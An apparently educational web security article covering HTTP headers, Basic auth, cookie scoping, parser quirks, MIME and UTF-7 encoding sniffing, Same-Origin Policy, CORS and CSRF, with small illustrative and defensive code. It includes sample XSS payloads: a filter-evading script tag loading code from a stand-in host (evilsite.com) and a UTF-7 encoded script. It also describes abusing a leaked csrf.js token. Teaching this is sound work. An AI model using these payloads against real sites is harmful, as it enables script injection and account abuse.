

In this story, we are going to talk about how the Interwebs work from a security perspective. We will cover:

HTTP basics

Cookie security

HTML parsing

MIME sniffing

Encoding sniffing

Same-Origin Policy

CSRF (Cross-Site Request Forgery)

So without further ado, let's START.

Everyone here has probably seen an HTTP/S request:

There are a couple of main parts to it:

Method: GET, POST, DELETE, PUT

Request path: here it is '/' (root)

Then there are a number of different headers like Host, User-Agent, and Accept. You have probably seen them a lot, and if you haven't, you will see them a lot in Burp.

The basic format is as follows:

VERB /resource/locator HTTP/1.1

Header1: Value1

Header2: Value2

…

<Body of request>
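To make the format above concrete, here is a minimal sketch that splits a raw request into its parts. The function name `parse_request` and the sample request are assumptions made for illustration; a real server handles many more edge cases (repeated headers, chunked bodies, and so on).

```python
def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into method, path, version, headers, body."""
    # The head and the body are separated by one empty line (CRLF CRLF).
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")

    # First line: VERB /resource/locator HTTP/1.1
    method, path, version = lines[0].split(" ", 2)

    # Remaining lines: "Header: Value". Header names are case-insensitive,
    # so they are stored lowercased.
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()

    return method, path, version, headers, body


# Hypothetical sample request, for illustration only.
sample = (
    "GET / HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "Accept: text/html\r\n"
    "\r\n"
)
method, path, version, headers, body = parse_request(sample)
print(method, path, version, headers["host"])
```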

Breakdown of Request Header

Host: Indicates the desired host handling the request

Accept: Indicates what MIME type(s) are accepted by the client; often used to select JSON or XML output for web services

Cookie: Passes cookie data back to the server

Referer: Page leading to the request (note: by default, browsers do not send this when going from an HTTPS page to a plain HTTP one)

Authorization: Used mainly for 'basic auth' pages. Takes the form "Basic <base64'd username:password>"

Basic auth is kinda important, so here you go:


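The Basic scheme is easy to reproduce by hand, which also shows why it offers no secrecy on its own: base64 is an encoding, not encryption. A small sketch follows; the helper names and the `user`/`pass` credentials are made up for illustration.

```python
import base64


def basic_auth_value(username: str, password: str) -> str:
    """Build the value of an Authorization header for Basic auth."""
    raw = f"{username}:{password}".encode("utf-8")
    return "Basic " + base64.b64encode(raw).decode("ascii")


def decode_basic_auth(value: str):
    """Recover (username, password) from a Basic Authorization value."""
    scheme, _, token = value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic auth value")
    decoded = base64.b64decode(token).decode("utf-8")
    # Split on the first colon only, since the password may contain colons.
    username, _, password = decoded.partition(":")
    return username, password


value = basic_auth_value("user", "pass")
print("Authorization:", value)      # Authorization: Basic dXNlcjpwYXNz
print(decode_basic_auth(value))     # ('user', 'pass')
```

Anyone who can see the header can run the decode step, so Basic auth should only ever travel over HTTPS.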

As most of you know, cookies are key-value pairs of data that are sent from the server and reside on the client for a fixed period of time.

Each cookie has a domain pattern that it applies to and they’re passed with each request the client makes to matching hosts.

COOKIE SECURITY

Cookies added for .example.com can be read by any subdomain of .example.com

Cookies added for a subdomain can only be read in that subdomain and its subdomains

A subdomain can set cookies that cover itself and its own subdomains, or its parent domain, but it can't set cookies for sibling domains

For example, test.example.com can't set cookies for test2.example.com, but it can set them for example.com, and a cookie it sets for test.example.com is also sent to foo.test.example.com
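The scoping rules can be sketched as a suffix match on host names. This is a simplified model in the spirit of RFC 6265 domain matching; the function names are hypothetical, and it deliberately ignores host-only cookies, IP addresses, and the public suffix list that real browsers also consult.

```python
def domain_matches(cookie_domain: str, host: str) -> bool:
    """True if `host` is the cookie domain itself or one of its subdomains."""
    cookie_domain = cookie_domain.lstrip(".").lower()
    host = host.lower()
    return host == cookie_domain or host.endswith("." + cookie_domain)


def is_sent_to(cookie_domain: str, request_host: str) -> bool:
    """Would a cookie scoped to `cookie_domain` be sent to `request_host`?"""
    return domain_matches(cookie_domain, request_host)


def can_set(setting_host: str, cookie_domain: str) -> bool:
    """May `setting_host` set a cookie scoped to `cookie_domain`?

    The setting host must itself fall inside the cookie's domain, which
    allows its own name or a parent domain but never a sibling.
    """
    return domain_matches(cookie_domain, setting_host)


print(is_sent_to(".example.com", "a.example.com"))         # True
print(can_set("test.example.com", "example.com"))          # True (parent)
print(can_set("test.example.com", "test2.example.com"))    # False (sibling)
print(is_sent_to("test.example.com", "foo.test.example.com"))  # True
```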

There are 2 important flags to know for cookies:

Secure: The cookie will only be sent over HTTPS connections

HTTPOnly: The cookie cannot be read by JavaScript (the browser still sends it with web requests, but scripts cannot access it)

The server sets these flags in the Set-Cookie header when it first sends the cookie.
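As a sketch of what that header looks like, Python's standard `http.cookies` module can build one. The cookie name `session`, its value, and the domain are placeholders chosen for this example.

```python
from http.cookies import SimpleCookie


def build_session_cookie(value: str) -> str:
    """Return a Set-Cookie header line with the Secure and HttpOnly flags."""
    cookie = SimpleCookie()
    cookie["session"] = value                    # hypothetical cookie name
    cookie["session"]["domain"] = "example.com"  # placeholder domain
    cookie["session"]["path"] = "/"
    cookie["session"]["secure"] = True    # only send over HTTPS
    cookie["session"]["httponly"] = True  # hide from JavaScript
    return cookie.output()


print(build_session_cookie("abc123"))
```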

Parsing

HTML should be parsed according to the relevant spec, generally HTML5 now.

But when you’re talking about security, it’s often not just parsed by your browser, but also WAFs and other filters.

Whenever there's a discrepancy between how the browser and a filter parse the same input, there's probably a vuln.

For Example:

You go to http://example.com/vulnerable?name=<script/xss%20src=http://evilsite.com/my.js> and it generates:

A bad XSS filter on the web application may not see that as a script tag, because it looks like a 'script/xss' tag. But Firefox's HTML parser, for instance, will treat the slash as whitespace, which enables the attack and simply leaves an empty xss attribute on the script tag.
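The discrepancy can be reproduced outside a browser. In the sketch below, a naive regex stands in for the bad filter and Python's `html.parser` stands in for a tolerant HTML parser. Both are assumptions for illustration: the regex is not taken from any real WAF, and `html.parser` is not Firefox's parser, it just happens to split the tag name at the slash in a similar way.

```python
import re
from html.parser import HTMLParser

# Hypothetical naive filter: expects whitespace or '>' right after "<script".
NAIVE_SCRIPT_PATTERN = re.compile(r"<script[\s>]", re.IGNORECASE)


def naive_filter_flags(markup: str) -> bool:
    """True if the naive filter would flag this markup as a script tag."""
    return bool(NAIVE_SCRIPT_PATTERN.search(markup))


class TagCollector(HTMLParser):
    """Records the name of every start tag the parser recognises."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def parsed_tags(markup: str):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


payload = "<script/xss src=http://evilsite.com/my.js>"
print(naive_filter_flags(payload))  # the filter's verdict
print(parsed_tags(payload))         # what the tolerant parser saw
```

If the filter says "no script tag" while the parser reports one, the two disagree, and that gap is where the attack fits.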

Legacy Parsing

Due to decades of bad HTML, browsers are quite excellent at cleaning up after authors, and these conditions are often exploitable.

A <script> tag on its own will automatically be closed at the end of the page.

A tag missing its closing angle bracket will automatically be closed by the angle bracket of the next tag on the page.

Content sniffing is where you send data to the browser without telling it everything about what you are sending.

Examples are MIME type sniffing, where the browser guesses what type of file you are sending it, and encoding sniffing, where it works out what sort of text encoding (ASCII, UTF-8, etc.) you are sending it.

The browser sniffs the content to see whether it matches certain heuristics and then handles it accordingly.

MIME Sniffing

The browser will often not just look at the Content-Type header that the server is passing, but also at the contents of the page. If it looks enough like HTML, it'll be parsed as HTML.

This led to IE 6/7-era bugs where image and text files containing HTML tags would execute as HTML.

Imagine a site with a file upload function for profile pictures.

If an uploaded file contains enough HTML to trigger the sniffing heuristics, an attacker could upload it as a "picture" and then send victims a link to it.

This is one of the reasons why Facebook and other sites use a separate domain to host such content.
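A toy model makes the upload risk easier to see. The heuristic below is invented for this example and is not any browser's actual sniffing algorithm; the tag list and the 512-byte window are assumptions. It only shows the general shape: the declared type loses if the body looks like HTML.

```python
import re

# Hypothetical heuristic: a few HTML-looking tags near the start of the body.
HTML_HINTS = re.compile(rb"<\s*(html|script|body|iframe|img)\b", re.IGNORECASE)


def sniffed_type(declared_type: str, body: bytes, window: int = 512) -> str:
    """Return the type a sniffing client might act on for this response."""
    if HTML_HINTS.search(body[:window]):
        return "text/html"
    return declared_type


# A file that starts like a GIF but carries markup right after the header.
fake_image = b"GIF89a" + b"<script>alert(1)</script>"
print(sniffed_type("image/gif", fake_image))        # text/html
print(sniffed_type("image/gif", b"GIF89a\x01\x02"))  # image/gif
```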

Encoding Sniffing

Similarly, the encoding used on a document will be sniffed by (mainly older) browsers.

If you don’t specify an encoding for an HTML document, the browser will apply heuristics to determine it.

If you are able to control the way the browser decodes text, you may be able to alter the parsing.

A good example is putting UTF-7 (7-bit Unicode with Base-64'd block denoted by +..-) text into XSS payloads.

Consider the payload:

+ADw-script+AD4-alert(1);+ADw-/script+AD4-

This will go cleanly through HTML encoding, as there are no ‘unsafe’ characters.

IE8 and below, along with a host of other older browsers, will see this on a page, sniff the page as UTF-7, and switch the parsing over, enabling the attack to succeed.
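Both halves of that claim can be checked with Python's standard library, used here only as a stand-in for the server's HTML encoder and the browser's decoder. Note that each encoded block begins with a `+` sign, so the payload as a whole starts with `+ADw-`.

```python
import html

payload = "+ADw-script+AD4-alert(1);+ADw-/script+AD4-"

# HTML encoding leaves the payload untouched: it contains none of & < > " '
escaped = html.escape(payload)
print(escaped == payload)  # True

# A client that decides the page is UTF-7 decodes it into live markup.
decoded = escaped.encode("ascii").decode("utf-7")
print(decoded)  # <script>alert(1);</script>
```

Declaring the encoding explicitly removes the need for the browser to guess in the first place.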

Same-Origin Policy (SOP) is how the browser restricts a number of security-critical features:

What domains you can contact via XMLHttpRequest

Access to the DOM across separate frames/windows

Origin Matching

The way origin matching for SOP works is much more strict than cookies:

Protocols must match: no crossing HTTP/HTTPS boundaries

Port numbers must match

Domain names must be an exact match: no wildcarding or subdomain walking

SOP Loosening

It's possible for developers to loosen the grip that SOP has on their communications by changing document.domain, by posting messages between windows with postMessage, and by using CORS (cross-origin resource sharing).

All of these open up interesting avenues for attack. Anyone can call postMessage into an IFrame — how many pages validate messages properly?
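A message handler that validates properly would compare the sender's origin using the same strict match described under Origin Matching: protocol, host, and port all equal. The sketch below models that check in Python, next to a careless prefix check of the kind that is easy to write by mistake. The function names and URLs are illustrative assumptions.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin_of(url: str):
    """Reduce a URL to its (scheme, host, port) origin tuple."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    # Fill in the scheme's default port when none is given explicitly.
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return scheme, host, port


def same_origin(a: str, b: str) -> bool:
    """Strict match: scheme, host, and port must all be equal."""
    return origin_of(a) == origin_of(b)


def naive_trusts(sender_origin: str, trusted: str) -> bool:
    """Careless check: a prefix comparison instead of an exact match."""
    return sender_origin.startswith(trusted)


trusted = "https://example.com"
attacker = "https://example.com.evil.net"
print(naive_trusts(attacker, trusted))  # True: the prefix check is fooled
print(same_origin(attacker, trusted))   # False: the strict check is not
```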

CORS

CORS enables some very risky situations. In essence, you're allowed to make XMLHttpRequests to a domain outside of your origin, but those requests carry special headers to signify where the request originates, what custom headers are added, etc.

It’s possible to even have it pass the receiving domain’s cookies, allowing attackers to potentially compromise logged-in users. The security prospects here are still largely unexplored.
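On the receiving side, the decision comes down to which response headers the server sends back. Here is a minimal sketch of a cautious policy, assuming an explicit allowlist of origins. The function name and the allowlisted origin are hypothetical; `Access-Control-Allow-Origin` and `Access-Control-Allow-Credentials` are the standard CORS response headers.

```python
def cors_headers(request_origin, allowed_origins, allow_credentials=False):
    """Return the CORS response headers for a request, or {} to refuse."""
    # Only echo back origins that are explicitly trusted. Reflecting any
    # Origin while also allowing credentials is what exposes logged-in users.
    if request_origin not in allowed_origins:
        return {}
    headers = {
        "Access-Control-Allow-Origin": request_origin,
        "Vary": "Origin",  # responses differ per origin, so caches must too
    }
    if allow_credentials:
        headers["Access-Control-Allow-Credentials"] = "true"
    return headers


allowed = {"https://app.example.com"}  # hypothetical trusted origin
print(cors_headers("https://app.example.com", allowed, allow_credentials=True))
print(cors_headers("https://evil.example.net", allowed, allow_credentials=True))
```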



Cross-Site Request Forgery is when an attacker tricks a victim into going to a page controlled by the attacker, which then submits data to the target site as the victim.

It is one of the most common vulnerabilities today and enables a whole host of others, namely XSS.

For example, consider a bank transfer site:

Here we have a form that allows a user to transfer money from their account to a destination account.

Unknown Origin

When a server gets such a transfer request from the client, how can it tell that it actually came from the real site? Referer headers are unreliable at best.

Here we can see an automatic exploit that will transfer money if the user is logged in.

Mitigation

Clearly, we need a way for the server to know for sure the request has originated on its own page.

The best way to mitigate this bug is through the use of CSRF tokens. These are random tokens tied to a user’s session, which you embed in each form that you generate.

Here you can see a form containing a safe, random CSRF token. In this case, it's 32 nibbles of hex, which is plenty of randomness to prevent guessing it.

Whenever the server gets a POST request, it should check to see the CSRF token is present and matches the token associated with the user’s session.

Note that this will typically not help you with GET requests, but applications should not be changing state with GET requests anyway.
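A minimal sketch of the token lifecycle, assuming the session is a plain dictionary and the token lives under a `csrf_token` key (both are placeholders, not any particular framework's API):

```python
import hmac
import secrets


def issue_csrf_token(session: dict) -> str:
    """Create a random token, tie it to the session, and return it for the form."""
    token = secrets.token_hex(16)  # 16 random bytes = 32 hex nibbles
    session["csrf_token"] = token
    return token


def is_valid_csrf(session: dict, submitted) -> bool:
    """Check that a submitted token is present and matches the session's token."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    # Constant-time comparison avoids leaking how many characters matched.
    return hmac.compare_digest(expected.encode("utf-8"), submitted.encode("utf-8"))


session = {}
token = issue_csrf_token(session)
print(len(token))                           # 32
print(is_valid_csrf(session, token))        # True
print(is_valid_csrf(session, "0" * 32))     # False, barring a 1-in-2^128 fluke
print(is_valid_csrf(session, None))         # False
```

The server would call `is_valid_csrf` on every state-changing POST before doing any work.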

How not to mitigate

I've seen a number of sites implement "dynamic CSRF-proof forms". They had a csrf.js file that sends back code roughly equivalent to: $csrf = 'session CSRF token';

On each page, they had <script src="/csrf.js"> and then baked the CSRF token into the forms from there.

So all I had to do was include that same tag in my own exploit!
